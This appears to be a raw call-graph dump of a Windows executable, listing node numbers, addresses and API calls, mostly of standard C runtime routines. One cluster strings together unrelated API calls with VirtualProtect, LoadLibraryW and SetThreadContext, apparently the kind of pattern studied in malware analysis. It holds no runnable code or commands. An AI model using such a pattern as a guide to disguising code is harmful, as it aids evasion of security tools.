40ace6 __write_nolock 56 API calls 8325->8327 8326->8285 8328 411b0d 8327->8328 8329 40ac94 __write_nolock 5 API calls 8328->8329 8330 411b18 8329->8330 8330->8285 8332 411a90 8331->8332 8333 411a89 8331->8333 8334 40ace6 __write_nolock 56 API calls 8332->8334 8333->8332 8338 411ab1 8333->8338 8335 411a95 8334->8335 8336 40ac94 __write_nolock 5 API calls 8335->8336 8337 40b5c4 8336->8337 8337->8305 8337->8310 8338->8337 8339 40ace6 __write_nolock 56 API calls 8338->8339 8339->8335 8341 40ab19 __call_reportfault IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8340->8341 8342 40ac54 GetCurrentProcess TerminateProcess 8341->8342 8342->8310 8344 40a61a __init_pointers EncodePointer 8343->8344 8345 4117d8 8344->8345 8346 411865 8345->8346 8347 4117e8 LoadLibraryW 8345->8347 8349 41187f DecodePointer DecodePointer 8346->8349 8357 411892 8346->8357 8348 4117fd GetProcAddress 8347->8348 8354 4118fd 8347->8354 8352 411813 7 API calls 8348->8352 8348->8354 8349->8357 8350 4118f1 DecodePointer 8350->8354 8351 4118c8 DecodePointer 8351->8350 8355 4118cf 8351->8355 8352->8346 8353 411855 GetProcAddress EncodePointer 8352->8353 8353->8346 8354->8294 8355->8350 8356 4118e2 DecodePointer 8355->8356 8356->8350 8358 4118b5 8356->8358 8357->8350 8357->8351 8357->8358 8358->8350 8360 40761c ExitProcess 8359->8360 8361 40760c GetProcAddress 8359->8361 8361->8360 8363 4075e1 _malloc 8362->8363 8368 407572 _malloc 8362->8368 8365 40ace6 __write_nolock 55 API calls 8363->8365 8364 40b6f4 __FF_MSGBANNER 55 API calls 8364->8368 8366 4075d9 8365->8366 8366->8319 8367 4075a0 HeapAlloc 8367->8366 8367->8368 8368->8364 8368->8367 8369 40b545 __NMSG_WRITE 55 API calls 8368->8369 8370 4075cd 8368->8370 8372 407623 __mtinitlocknum GetModuleHandleW GetProcAddress ExitProcess 8368->8372 8373 4075cb 8368->8373 8369->8368 8371 40ace6 __write_nolock 55 API calls 8370->8371 8371->8373 8372->8368 8374 40ace6 __write_nolock 55 API calls 8373->8374 8374->8366 8375->8323 8376->8242 8377->8257 8379 40bdc7 EncodePointer 8378->8379 8379->8379 8380 40bde1 8379->8380 8380->8121 8384 4079ca 8381->8384 8383 407a13 8383->8123 8385 4079d6 __mtinitlocknum 8384->8385 8392 40763b 8385->8392 8391 4079f7 __mtinitlocknum 8391->8383 8393 40b8de __lock 56 API calls 8392->8393 8394 407642 8393->8394 8395 4078e3 DecodePointer DecodePointer 8394->8395 8396 407911 8395->8396 8397 407992 8395->8397 8396->8397 8409 40bf3c 8396->8409 8406 407a00 8397->8406 8399 407975 EncodePointer EncodePointer 8399->8397 8400 407923 8400->8399 8401 407947 8400->8401 8416 409a48 8400->8416 8401->8397 8403 409a48 __realloc_crt 60 API calls 8401->8403 8404 407963 EncodePointer 8401->8404 8405 40795d 8403->8405 8404->8399 8405->8397 8405->8404 8448 407644 8406->8448 8410 40bf47 8409->8410 8411 40bf5c HeapSize 8409->8411 8412 40ace6 __write_nolock 56 API calls 8410->8412 8411->8400 8413 40bf4c 8412->8413 8421 40ac94 8413->8421 8419 409a51 8416->8419 8418 409a90 8418->8401 8419->8418 8420 409a71 Sleep 8419->8420 8430 4108d6 8419->8430 8420->8419 8424 40ac67 8421->8424 8425 40ac78 8424->8425 8426 40ac42 __invoke_watson 5 API calls 8425->8426 8427 40ac93 8426->8427 8428 40ac67 __write_nolock 5 API calls 8427->8428 8429 40aca0 8428->8429 8429->8400 8431 4108e1 8430->8431 8432 4108ec 8430->8432 8433 407564 _malloc 56 API calls 8431->8433 8434 4108f4 8432->8434 8440 410901 _malloc 8432->8440 8435 4108e9 8433->8435 8436 40742e _free 56 API calls 8434->8436 8435->8419 8443 4108fc __dosmaperr 8436->8443 8437 410939 _malloc 8441 40ace6 __write_nolock 56 API calls 8437->8441 8438 410909 HeapReAlloc 8438->8440 8438->8443 8439 410969 8442 40ace6 __write_nolock 56 API calls 8439->8442 8440->8437 8440->8438 8440->8439 8445 410951 8440->8445 8441->8443 8444 41096e GetLastError 8442->8444 8443->8419 8444->8443 8446 40ace6 __write_nolock 56 API calls 8445->8446 8447 410956 GetLastError 8446->8447 8447->8443 8451 40b805 LeaveCriticalSection 8448->8451 8450 40764b 8450->8391 8451->8450 8455 4257f0 __write_nolock 8452->8455 8453 42580e CharToOemBuffA 8453->8455 8454 425822 GetConsoleProcessList 8454->8455 8455->8453 8455->8454 8456 42584b 8455->8456 8457 42584d 8455->8457 8459 4258c7 8456->8459 8460 425877 RegisterClassA 8456->8460 8457->8456 8458 425856 WriteProfileStringW 8457->8458 8458->8456 8465 4258ff GetConsoleAliasW WriteConsoleOutputCharacterA GetFileType 8459->8465 8467 42592b GlobalAlloc 8459->8467 8461 4258aa 8460->8461 8462 42588b SetThreadContext GetFileAttributesExA 8460->8462 8496 407468 8461->8496 8462->8461 8464 4258b3 8515 405590 8464->8515 8465->8459 8469 42594e 8467->8469 8473 425a13 8467->8473 8471 425967 GetWindowsDirectoryW SetThreadAffinityMask ReadConsoleOutputCharacterA SetProcessShutdownParameters BuildCommDCBAndTimeoutsW 8469->8471 8476 4259c6 8469->8476 8471->8476 8472 425a25 GetPrivateProfileStringW 8472->8473 8473->8472 8475 425a3b 8473->8475 8478 425a6d AddAtomA GetSystemWindowsDirectoryW DisconnectNamedPipe GetConsoleCursorInfo 8475->8478 8479 425a99 VirtualProtect 8475->8479 8476->8469 8476->8473 8477 4259d5 GetVolumeInformationW GetConsoleAliasA SetProcessShutdownParameters 8476->8477 8527 4252a0 8476->8527 8477->8476 8478->8475 8488 4255c0 8479->8488 8481 425adc InterlockedDecrement GetCharWidthFloatW ClearEventLogA GlobalUnfix OpenWaitableTimerW 8482 425b0d GlobalFlags LocalFlags 8481->8482 8483 425aba 8482->8483 8483->8481 8483->8482 8484 425b39 LoadLibraryW 8483->8484 8485 425c14 GetConsoleCursorInfo SetConsoleCP TerminateProcess FindFirstFileA 8484->8485 8486 425d15 8484->8486 8487 425c51 13 API calls 8485->8487 8486->8129 8486->8130 8487->8486 8489 4257c6 8488->8489 8491 4255e2 8488->8491 8489->8483 8490 42560f ReadConsoleInputA 8490->8491 8491->8489 8491->8490 8492 4256e8 WriteConsoleInputW 8491->8492 8493 425728 GlobalGetAtomNameA 8491->8493 8494 425775 GetCommandLineW 8491->8494 8495 425795 MoveFileWithProgressA FindFirstFileW 8491->8495 8492->8491 8493->8491 8494->8491 8495->8491 8497 407474 __mtinitlocknum 8496->8497 8498 407487 8497->8498 8499 40749f 8497->8499 8501 40ace6 __write_nolock 56 API calls 8498->8501 8531 40ae83 8499->8531 8502 40748c 8501->8502 8504 40ac94 __write_nolock 5 API calls 8502->8504 8510 407497 __mtinitlocknum 8504->8510 8506 4074b5 8507 40751a 8506->8507 8512 40ace6 __write_nolock 56 API calls 8506->8512 8511 407528 8507->8511 8544 40af61 8507->8544 8510->8464 8565 40755c 8511->8565 8513 40750f 8512->8513 8514 40ac94 __write_nolock 5 API calls 8513->8514 8514->8507 8777 405110 8515->8777 8517 4055ed 8787 405f20 8517->8787 8520 40561f 8810 405e30 8520->8810 8524 407891 9171 40773b 8524->9171 8526 4078a2 8526->8459 8528 4252aa __write_nolock 8527->8528 8529 4252b7 9 API calls 8528->8529 8530 42533a 8528->8530 8529->8530 8530->8476 8532 40ae95 8531->8532 8533 40aeb7 EnterCriticalSection 8531->8533 8532->8533 8534 40ae9d 8532->8534 8536 4074a5 8533->8536 8535 40b8de __lock 56 API calls 8534->8535 8535->8536 8536->8507 8537 40b30a 8536->8537 8538 40b316 8537->8538 8539 40b32b 8537->8539 8540 40ace6 __write_nolock 56 API calls 8538->8540 8539->8506 8541 40b31b 8540->8541 8542 40ac94 __write_nolock 5 API calls 8541->8542 8543 40b326 8542->8543 8543->8506 8545 40b30a __flush 56 API calls 8544->8545 8546 40af71 8545->8546 8547 40af93 8546->8547 8548 40af7c 8546->8548 8550 40af97 8547->8550 8559 40afa4 __flsbuf 8547->8559 8549 40ace6 __write_nolock 56 API calls 8548->8549 8558 40af81 8549->8558 8551 40ace6 __write_nolock 56 API calls 8550->8551 8551->8558 8552 40b005 8553 40b094 8552->8553 8554 40b014 8552->8554 8556 4114e0 __write 81 API calls 8553->8556 8555 40b02b 8554->8555 8561 40b048 8554->8561 8580 4114e0 8555->8580 8556->8558 8558->8511 8559->8552 8559->8558 8562 40affa 8559->8562 8568 4115fd 8559->8568 8561->8558 8605 410cf9 8561->8605 8562->8552 8577 4115b4 8562->8577 8770 40aef6 8565->8770 8567 407562 8567->8510 8569 411619 8568->8569 8570 41160a 8568->8570 8572 40ace6 __write_nolock 56 API calls 8569->8572 8574 411637 8569->8574 8571 40ace6 __write_nolock 56 API calls 8570->8571 8573 41160f 8571->8573 8575 41162a 8572->8575 8573->8562 8574->8562 8576 40ac94 __write_nolock 5 API calls 8575->8576 8576->8573 8578 4099b7 __malloc_crt 56 API calls 8577->8578 8579 4115c9 8578->8579 8579->8552 8581 4114ec __mtinitlocknum 8580->8581 8582 4114f4 8581->8582 8583 41150f 8581->8583 8630 40acf9 8582->8630 8584 41151b 8583->8584 8590 411555 8583->8590 8587 40acf9 __write_nolock 56 API calls 8584->8587 8589 411520 8587->8589 8588 40ace6 __write_nolock 56 API calls 8602 411501 __mtinitlocknum 8588->8602 8591 40ace6 __write_nolock 56 API calls 8589->8591 8633 41241f 8590->8633 8594 411528 8591->8594 8593 41155b 8595 411569 8593->8595 8596 41157d 8593->8596 8597 40ac94 __write_nolock 5 API calls 8594->8597 8643 410de3 8595->8643 8599 40ace6 __write_nolock 56 API calls 8596->8599 8597->8602 8601 411582 8599->8601 8600 411575 8698 4115ac 8600->8698 8603 40acf9 __write_nolock 56 API calls 8601->8603 8602->8558 8603->8600 8606 410d05 __mtinitlocknum 8605->8606 8607 410d32 8606->8607 8608 410d16 8606->8608 8609 410d3e 8607->8609 8615 410d78 8607->8615 8610 40acf9 __write_nolock 56 API calls 8608->8610 8611 40acf9 __write_nolock 56 API calls 8609->8611 8612 410d1b 8610->8612 8614 410d43 8611->8614 8613 40ace6 __write_nolock 56 API calls 8612->8613 8616 410d23 __mtinitlocknum 8613->8616 8617 40ace6 __write_nolock 56 API calls 8614->8617 8618 41241f ___lock_fhandle 58 API calls 8615->8618 8616->8558 8619 410d4b 8617->8619 8620 410d7e 8618->8620 8623 40ac94 __write_nolock 5 API calls 8619->8623 8621 410da8 8620->8621 8622 410d8c 8620->8622 8625 40ace6 __write_nolock 56 API calls 8621->8625 8624 410c74 __lseeki64_nolock 58 API calls 8622->8624 8623->8616 8626 410d9d 8624->8626 8627 410dad 8625->8627 8766 410dd9 8626->8766 8628 40acf9 __write_nolock 56 API calls 8627->8628 8628->8626 8631 40a751 __getptd_noexit 56 API calls 8630->8631 8632 40acfe 8631->8632 8632->8588 8634 41242b __mtinitlocknum 8633->8634 8635 412485 8634->8635 8637 40b8de __lock 56 API calls 8634->8637 8636 41248a EnterCriticalSection 8635->8636 8639 4124a7 __mtinitlocknum 8635->8639 8636->8639 8638 412457 8637->8638 8640 412460 InitializeCriticalSectionAndSpinCount 8638->8640 8641 412473 8638->8641 8639->8593 8640->8641 8701 4124b5 8641->8701 8644 410df2 __write_nolock 8643->8644 8645 410e47 8644->8645 8646 410e28 8644->8646 8664 410e1d 8644->8664 8649 410ea3 8645->8649 8650 410e86 8645->8650 8647 40acf9 __write_nolock 56 API calls 8646->8647 8648 410e2d 8647->8648 8652 40ace6 __write_nolock 56 API calls 8648->8652 8651 410eb6 8649->8651 8705 410c74 8649->8705 8653 40acf9 __write_nolock 56 API calls 8650->8653 8656 4115fd __write_nolock 56 API calls 8651->8656 8655 410e34 8652->8655 8657 410e8b 8653->8657 8658 40ac94 __write_nolock 5 API calls 8655->8658 8659 410ebf 8656->8659 8660 40ace6 __write_nolock 56 API calls 8657->8660 8658->8664 8662 411161 8659->8662 8715 40a7ca 8659->8715 8661 410e93 8660->8661 8663 40ac94 __write_nolock 5 API calls 8661->8663 8665 411411 WriteFile 8662->8665 8666 411170 8662->8666 8663->8664 8664->8600 8670 411444 GetLastError 8665->8670 8671 411143 8665->8671 8668 41122b 8666->8668 8677 411183 8666->8677 8683 411238 8668->8683 8691 411305 8668->8691 8670->8671 8671->8664 8672 41148f 8671->8672 8676 411462 8671->8676 8672->8664 8675 40ace6 __write_nolock 56 API calls 8672->8675 8673 410f03 8673->8662 8674 410f13 GetConsoleCP 8673->8674 8674->8671 8696 410f36 __write_nolock 8674->8696 8679 4114b2 8675->8679 8681 411481 8676->8681 8682 41146d 8676->8682 8677->8671 8677->8672 8678 4111cd WriteFile 8677->8678 8678->8670 8678->8677 8685 40acf9 __write_nolock 56 API calls 8679->8685 8680 411376 WideCharToMultiByte 8680->8670 8687 4113ad WriteFile 8680->8687 8723 40ad0c 8681->8723 8686 40ace6 __write_nolock 56 API calls 8682->8686 8683->8671 8683->8672 8684 4112a7 WriteFile 8683->8684 8684->8670 8684->8683 8685->8664 8689 411472 8686->8689 8690 4113e4 GetLastError 8687->8690 8687->8691 8693 40acf9 __write_nolock 56 API calls 8689->8693 8690->8691 8691->8671 8691->8672 8691->8680 8691->8687 8693->8664 8694 410fe2 WideCharToMultiByte 8694->8671 8695 411013 WriteFile 8694->8695 8695->8670 8695->8696 8696->8670 8696->8671 8696->8694 8697 411067 WriteFile 8696->8697 8720 412163 8696->8720 8697->8670 8697->8696 8765 4124be LeaveCriticalSection 8698->8765 8700 4115b2 8700->8602 8704 40b805 LeaveCriticalSection 8701->8704 8703 4124bc 8703->8635 8704->8703 8728 4123b6 8705->8728 8707 410c92 8708 410cab SetFilePointer 8707->8708 8709 410c9a 8707->8709 8710 410cc3 GetLastError 8708->8710 8713 410c9f 8708->8713 8711 40ace6 __write_nolock 56 API calls 8709->8711 8712 410ccd 8710->8712 8710->8713 8711->8713 8714 40ad0c __dosmaperr 56 API calls 8712->8714 8713->8651 8714->8713 8716 40a751 __getptd_noexit 56 API calls 8715->8716 8717 40a7d2 8716->8717 8718 40a7df GetConsoleMode 8717->8718 8719 4078c5 __amsg_exit 56 API calls 8717->8719 8718->8662 8718->8673 8719->8718 8741 41212b 8720->8741 8724 40acf9 __write_nolock 56 API calls 8723->8724 8725 40ad17 __dosmaperr 8724->8725 8726 40ace6 __write_nolock 56 API calls 8725->8726 8727 40ad2a 8726->8727 8727->8664 8729 4123c3 8728->8729 8730 4123db 8728->8730 8731 40acf9 __write_nolock 56 API calls 8729->8731 8733 40acf9 __write_nolock 56 API calls 8730->8733 8734 41241a 8730->8734 8732 4123c8 8731->8732 8735 40ace6 __write_nolock 56 API calls 8732->8735 8736 4123ec 8733->8736 8734->8707 8740 4123d0 8735->8740 8737 40ace6 __write_nolock 56 API calls 8736->8737 8738 4123f4 8737->8738 8739 40ac94 __write_nolock 5 API calls 8738->8739 8739->8740 8740->8707 8744 407231 8741->8744 8743 41213e 8743->8696 8745 407244 8744->8745 8749 407271 8744->8749 8746 40a7ca __getptd 56 API calls 8745->8746 8747 407249 8746->8747 8747->8749 8750 40a5a1 8747->8750 8749->8743 8751 40a5ad __mtinitlocknum 8750->8751 8752 40a7ca __getptd 56 API calls 8751->8752 8753 40a5b2 8752->8753 8754 40a5e0 8753->8754 8755 40a5c4 8753->8755 8756 40b8de __lock 56 API calls 8754->8756 8757 40a7ca __getptd 56 API calls 8755->8757 8758 40a5e7 8756->8758 8759 40a5c9 8757->8759 8760 40a554 __updatetlocinfoEx_nolock 64 API calls 8758->8760 8763 40a5d7 __mtinitlocknum 8759->8763 8764 4078c5 __amsg_exit 56 API calls 8759->8764 8761 40a5fb 8760->8761 8762 40a60e _LocaleUpdate::_LocaleUpdate LeaveCriticalSection 8761->8762 8762->8759 8763->8749 8764->8763 8765->8700 8769 4124be LeaveCriticalSection 8766->8769 8768 410de1 8768->8616 8769->8768 8771 40af26 LeaveCriticalSection 8770->8771 8772 40af07 8770->8772 8771->8567 8772->8771 8773 40af0e 8772->8773 8776 40b805 LeaveCriticalSection 8773->8776 8775 40af23 8775->8567 8776->8775 8821 407a84 8777->8821 8780 405188 8780->8517 8782 405156 8848 406a52 8782->8848 8944 4050e0 8787->8944 8792 406a52 std::_Lockit::_Lockit EnterCriticalSection 8793 405f71 8792->8793 8795 406a7a std::locale::_Init LeaveCriticalSection 8793->8795 8794 4055fc 8794->8520 8796 405010 8794->8796 8795->8794 8797 405060 8796->8797 8798 405024 8796->8798 8799 4050a0 8797->8799 8801 407340 std::exception::exception 56 API calls 8797->8801 8800 407340 std::exception::exception 56 API calls 8798->8800 8802 407340 std::exception::exception 56 API calls 8799->8802 8803 405041 8800->8803 8804 405081 8801->8804 8805 4050bd 8802->8805 8806 4080c1 __CxxThrowException@8 RaiseException 8803->8806 8807 4080c1 __CxxThrowException@8 RaiseException 8804->8807 8808 4080c1 __CxxThrowException@8 RaiseException 8805->8808 8806->8797 8807->8799 8809 4050dc 8808->8809 9165 406a91 8810->9165 8813 407a84 std::locale::_Init 67 API calls 8814 405e69 8813->8814 8815 406969 std::locale::_Init 70 API calls 8814->8815 8820 40563a 8814->8820 8816 405e78 8815->8816 8817 406a52 std::_Lockit::_Lockit EnterCriticalSection 8816->8817 8818 405e8c 8817->8818 8819 406a7a std::locale::_Init LeaveCriticalSection 8818->8819 8819->8820 8820->8524 8824 407a8e _malloc 8821->8824 8822 407564 _malloc 56 API calls 8822->8824 8823 405148 8823->8780 8832 406969 8823->8832 8824->8822 8824->8823 8828 407aaa std::exception::exception 8824->8828 8825 407ae8 8856 4073ec 8825->8856 8828->8825 8830 407a06 __cinit 66 API calls 8828->8830 8830->8825 8831 407b03 8833 406975 __EH_prolog3 8832->8833 8834 4069f0 std::locale::_Locimp::~_Locimp 8833->8834 8835 406a52 std::_Lockit::_Lockit EnterCriticalSection 8833->8835 8834->8782 8836 40698b 8835->8836 8837 4069da 8836->8837 8839 407a84 std::locale::_Init 67 API calls 8836->8839 8838 406a7a std::locale::_Init LeaveCriticalSection 8837->8838 8838->8834 8840 4069a0 8839->8840 8841 4069ad 8840->8841 8887 4068c6 8840->8887 8890 40672e 8841->8890 8846 4069cd 8900 404cd0 8846->8900 8849 405169 8848->8849 8850 406a64 8848->8850 8852 406a7a 8849->8852 8942 406ead EnterCriticalSection 8850->8942 8853 40517e 8852->8853 8854 406a81 8852->8854 8853->8517 8943 406ebd LeaveCriticalSection 8854->8943 8862 407367 8856->8862 8859 4080c1 8860 4080f6 RaiseException 8859->8860 8861 4080ea 8859->8861 8860->8831 8861->8860 8863 407377 8862->8863 8867 40738c 8862->8867 8868 407322 8863->8868 8867->8859 8869 407335 8868->8869 8870 40732d 8868->8870 8869->8867 8872 4072e2 8869->8872 8871 40742e _free 56 API calls 8870->8871 8871->8869 8873 4072f0 _TestDefaultLanguage 8872->8873 8874 407315 8872->8874 8875 407564 _malloc 56 API calls 8873->8875 8874->8867 8876 407302 8875->8876 8876->8874 8878 40ad2f 8876->8878 8879 40ad44 8878->8879 8880 40ad3d 8878->8880 8881 40ace6 __write_nolock 56 API calls 8879->8881 8880->8879 8883 40ad62 8880->8883 8886 40ad49 8881->8886 8882 40ac94 __write_nolock 5 API calls 8884 40ad53 8882->8884 8883->8884 8885 40ace6 __write_nolock 56 API calls 8883->8885 8884->8874 8885->8886 8886->8882 8888 406821 _Yarn 56 API calls 8887->8888 8889 4068fe 8888->8889 8889->8841 8891 40673c 8890->8891 8892 40674d 8890->8892 8905 406e30 8891->8905 8894 406821 8892->8894 8895 406833 8894->8895 8899 40685e _memmove 8894->8899 8896 40742e _free 56 API calls 8895->8896 8897 40683d 8895->8897 8896->8897 8898 407564 _malloc 56 API calls 8897->8898 8897->8899 8898->8899 8899->8846 8901 406a52 std::_Lockit::_Lockit EnterCriticalSection 8900->8901 8902 404cdf 8901->8902 8903 406a7a std::locale::_Init LeaveCriticalSection 8902->8903 8904 404cf4 8903->8904 8904->8837 8906 406e44 EncodePointer 8905->8906 8907 406e3e _abort 8905->8907 8906->8892 8908 409aa6 8907->8908 8914 40ba08 8907->8914 8910 409abe 8908->8910 8932 40ab19 8908->8932 8912 407891 _abort 56 API calls 8910->8912 8913 409ac8 8912->8913 8921 40ba14 __mtinitlocknum 8914->8921 8915 40ba6f 8918 40ba7e 8915->8918 8919 40ba40 _siglookup 8915->8919 8916 40ba3b 8917 40a751 __getptd_noexit 56 API calls 8916->8917 8917->8919 8920 40ace6 __write_nolock 56 API calls 8918->8920 8923 40badb 8919->8923 8925 407891 _abort 56 API calls 8919->8925 8931 40ba49 __mtinitlocknum 8919->8931 8922 40ba83 8920->8922 8921->8915 8921->8916 8921->8918 8921->8919 8924 40ac94 __write_nolock 5 API calls 8922->8924 8926 40b8de __lock 56 API calls 8923->8926 8928 40bae6 8923->8928 8924->8931 8925->8923 8926->8928 8929 40bb1b 8928->8929 8936 40a61a EncodePointer 8928->8936 8937 40bb6f 8929->8937 8931->8908 8933 40ab38 8932->8933 8934 40ab56 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8933->8934 8935 40ac24 8934->8935 8935->8910 8936->8929 8938 40bb75 8937->8938 8939 40bb7c 8937->8939 8941 40b805 LeaveCriticalSection 8938->8941 8939->8931 8941->8939 8942->8849 8943->8853 8945 406a52 std::_Lockit::_Lockit EnterCriticalSection 8944->8945 8946 4050f4 8945->8946 8947 406a7a std::locale::_Init LeaveCriticalSection 8946->8947 8948 405109 8947->8948 8949 405fd0 8948->8949 8950 406a52 std::_Lockit::_Lockit EnterCriticalSection 8949->8950 8951 405ff5 8950->8951 8952 406a52 std::_Lockit::_Lockit EnterCriticalSection 8951->8952 8954 40603d 8951->8954 8953 40601b 8952->8953 8955 406a7a std::locale::_Init LeaveCriticalSection 8953->8955 8969 40607a 8954->8969 8970 404dc0 8954->8970 8955->8954 8956 406a7a std::locale::_Init LeaveCriticalSection 8958 405f54 8956->8958 8958->8792 8958->8794 8960 4060ae 8961 406a52 std::_Lockit::_Lockit EnterCriticalSection 8960->8961 8964 4060c3 8961->8964 8966 406a7a std::locale::_Init LeaveCriticalSection 8964->8966 8965 4080c1 __CxxThrowException@8 RaiseException 8965->8960 8967 4060d8 8966->8967 8983 4066b1 8967->8983 8969->8956 8971 404e81 8970->8971 8972 404dec 8970->8972 8971->8960 8980 40739c 8971->8980 8972->8971 8973 407a84 std::locale::_Init 67 API calls 8972->8973 8974 404dfc 8973->8974 8975 404e45 8974->8975 8986 404b70 8974->8986 8975->8971 9007 404c10 8975->9007 8981 407340 std::exception::exception 56 API calls 8980->8981 8982 40609f 8981->8982 8982->8965 8984 407a84 std::locale::_Init 67 API calls 8983->8984 8985 4066bd 8984->8985 8985->8969 8987 406a52 std::_Lockit::_Lockit EnterCriticalSection 8986->8987 8988 404b98 8987->8988 8989 404bea 8988->8989 9020 407340 8988->9020 9023 406879 8989->9023 8994 4080c1 __CxxThrowException@8 RaiseException 8994->8989 8995 406be1 9146 409991 8995->9146 9000 4099fc __calloc_crt 56 API calls 9001 406c08 9000->9001 9002 406c30 9001->9002 9003 406c11 9001->9003 9005 40949d ___pctype_func 64 API calls 9002->9005 9156 40949d 9003->9156 9006 406c1b _memmove 9005->9006 9006->8975 9161 406806 9007->9161 9010 404c4b 9012 404c5e 9010->9012 9013 40742e _free 56 API calls 9010->9013 9011 40742e _free 56 API calls 9011->9010 9014 404c71 9012->9014 9015 40742e _free 56 API calls 9012->9015 9013->9012 9017 40742e _free 56 API calls 9014->9017 9019 404c84 9014->9019 9015->9014 9016 406a7a std::locale::_Init LeaveCriticalSection 9018 404c99 9016->9018 9017->9019 9018->8971 9019->9016 9021 4072e2 std::exception::_Copy_str 56 API calls 9020->9021 9022 404bd3 9021->9022 9022->8994 9032 4090dc 9023->9032 9025 406887 9026 406821 _Yarn 56 API calls 9025->9026 9027 40689f 9026->9027 9028 4068af 9027->9028 9029 4090dc _setlocale 79 API calls 9027->9029 9030 406821 _Yarn 56 API calls 9028->9030 9029->9028 9031 404bf1 9030->9031 9031->8995 9033 4090e8 __mtinitlocknum 9032->9033 9034 4090f2 9033->9034 9035 409109 9033->9035 9036 40ace6 __write_nolock 56 API calls 9034->9036 9037 40a7ca __getptd 56 API calls 9035->9037 9038 4090f7 9036->9038 9039 40910e 9037->9039 9040 40ac94 __write_nolock 5 API calls 9038->9040 9041 40a5a1 _LocaleUpdate::_LocaleUpdate 64 API calls 9039->9041 9045 409102 __mtinitlocknum _setlocale 9040->9045 9042 409118 9041->9042 9043 4099fc __calloc_crt 56 API calls 9042->9043 9044 40912e 9043->9044 9044->9045 9046 40b8de __lock 56 API calls 9044->9046 9045->9025 9047 409144 9046->9047 9068 40860f 9047->9068 9053 409168 9054 409225 9053->9054 9055 409174 __setlocale_get_all 9053->9055 9056 40a370 ___removelocaleref 8 API calls 9054->9056 9058 40b8de __lock 56 API calls 9055->9058 9057 40922b 9056->9057 9116 40a409 9057->9116 9059 40919a 9058->9059 9091 40a554 9059->9091 9065 4091d0 9113 40921a 9065->9113 9067 40a554 __updatetlocinfoEx_nolock 64 API calls 9067->9065 9069 408631 9068->9069 9070 408618 9068->9070 9072 40920e 9069->9072 9070->9069 9071 40a2e1 ___addlocaleref 8 API calls 9070->9071 9071->9069 9073 40b805 _doexit LeaveCriticalSection 9072->9073 9074 40915b 9073->9074 9075 408ec0 9074->9075 9076 408ee9 9075->9076 9081 408f04 9075->9081 9078 408b86 __setlocale_set_cat 79 API calls 9076->9078 9083 408ef3 9076->9083 9077 40902e 9080 408800 __setlocale_get_all 60 API calls 9077->9080 9077->9083 9078->9083 9079 409055 9082 408965 __expandlocale 75 API calls 9079->9082 9080->9083 9081->9077 9081->9079 9087 408f39 _strpbrk _TestDefaultLanguage _strncmp _strcspn 9081->9087 9084 40906a __setlocale_get_all 9082->9084 9083->9053 9084->9077 9084->9083 9085 408b86 __setlocale_set_cat 79 API calls 9084->9085 9085->9084 9086 40d45e ___getlocaleinfo 56 API calls 9086->9087 9087->9077 9087->9083 9087->9086 9088 409047 9087->9088 9090 408b86 __setlocale_set_cat 79 API calls 9087->9090 9089 40ac42 __invoke_watson 5 API calls 9088->9089 9089->9083 9090->9087 9092 4091ac 9091->9092 9093 40a561 9091->9093 9099 40a370 9092->9099 9093->9092 9094 40a2e1 ___addlocaleref 8 API calls 9093->9094 9095 40a577 9094->9095 9095->9092 9096 40a370 ___removelocaleref 8 API calls 9095->9096 9097 40a582 9096->9097 9097->9092 9098 40a409 ___freetlocinfo 56 API calls 9097->9098 9098->9092 9100 40a381 InterlockedDecrement 9099->9100 9101 4091b2 9099->9101 9102 40a396 InterlockedDecrement 9100->9102 9103 40a399 9100->9103 9101->9065 9101->9067 9102->9103 9104 40a3a3 InterlockedDecrement 9103->9104 9105 40a3a6 9103->9105 9104->9105 9106 40a3b0 InterlockedDecrement 9105->9106 9107 40a3b3 9105->9107 9106->9107 9108 40a3c0 9107->9108 9109 40a3bd InterlockedDecrement 9107->9109 9110 40a3d9 InterlockedDecrement 9108->9110 9111 40a3e9 InterlockedDecrement 9108->9111 9112 40a3f4 InterlockedDecrement 9108->9112 9109->9108 9110->9108 9111->9108 9112->9101 9114 40b805 _doexit LeaveCriticalSection 9113->9114 9115 409221 9114->9115 9115->9045 9117 40a48d 9116->9117 9120 40a420 9116->9120 9118 40742e _free 56 API calls 9117->9118 9119 40a4da 9117->9119 9121 40a4ae 9118->9121 9122 40dd12 ___free_lc_time 56 API calls 9119->9122 9132 40a503 9119->9132 9120->9117 9126 40a454 9120->9126 9130 40742e _free 56 API calls 9120->9130 9123 40742e _free 56 API calls 9121->9123 9124 40a4f8 9122->9124 9125 40a4c1 9123->9125 9129 40742e _free 56 API calls 9124->9129 9134 40742e _free 56 API calls 9125->9134 9135 40742e _free 56 API calls 9126->9135 9145 40a475 9126->9145 9127 40742e _free 56 API calls 9136 40a482 9127->9136 9128 40a548 9131 40742e _free 56 API calls 9128->9131 9129->9132 9133 40a449 9130->9133 9137 40a54e 9131->9137 9132->9128 9141 40742e 56 API calls _free 9132->9141 9138 40e35f ___free_lconv_mon 56 API calls 9133->9138 9139 40a4cf 9134->9139 9140 40a46a 9135->9140 9142 40742e _free 56 API calls 9136->9142 9137->9045 9138->9126 9143 40742e _free 56 API calls 9139->9143 9144 40e106 ___free_lconv_num 56 API calls 9140->9144 9141->9132 9142->9117 9143->9119 9144->9145 9145->9127 9147 40a7ca __getptd 56 API calls 9146->9147 9148 409996 9147->9148 9149 406bec 9148->9149 9150 40a5a1 _LocaleUpdate::_LocaleUpdate 64 API calls 9148->9150 9151 40996b 9149->9151 9150->9149 9152 40a7ca __getptd 56 API calls 9151->9152 9153 409970 9152->9153 9154 406bf9 9153->9154 9155 40a5a1 _LocaleUpdate::_LocaleUpdate 64 API calls 9153->9155 9154->9000 9155->9154 9157 40a7ca __getptd 56 API calls 9156->9157 9158 4094a2 9157->9158 9159 4094bf 9158->9159 9160 40a5a1 _LocaleUpdate::_LocaleUpdate 64 API calls 9158->9160 9159->9006 9160->9159 9162 406815 9161->9162 9163 404c39 9161->9163 9164 4090dc _setlocale 79 API calls 9162->9164 9163->9010 9163->9011 9164->9163 9166 407a84 std::locale::_Init 67 API calls 9165->9166 9167 406a9d 9166->9167 9170 406e8d InitializeCriticalSection 9167->9170 9169 405e5a 9169->8813 9170->9169 9172 407747 __mtinitlocknum 9171->9172 9173 40b8de __lock 51 API calls 9172->9173 9174 40774e 9173->9174 9176 407779 DecodePointer 9174->9176 9180 4077f8 9174->9180 9177 407790 DecodePointer 9176->9177 9176->9180 9186 4077a3 9177->9186 9179 407875 __mtinitlocknum 9179->8526 9194 407866 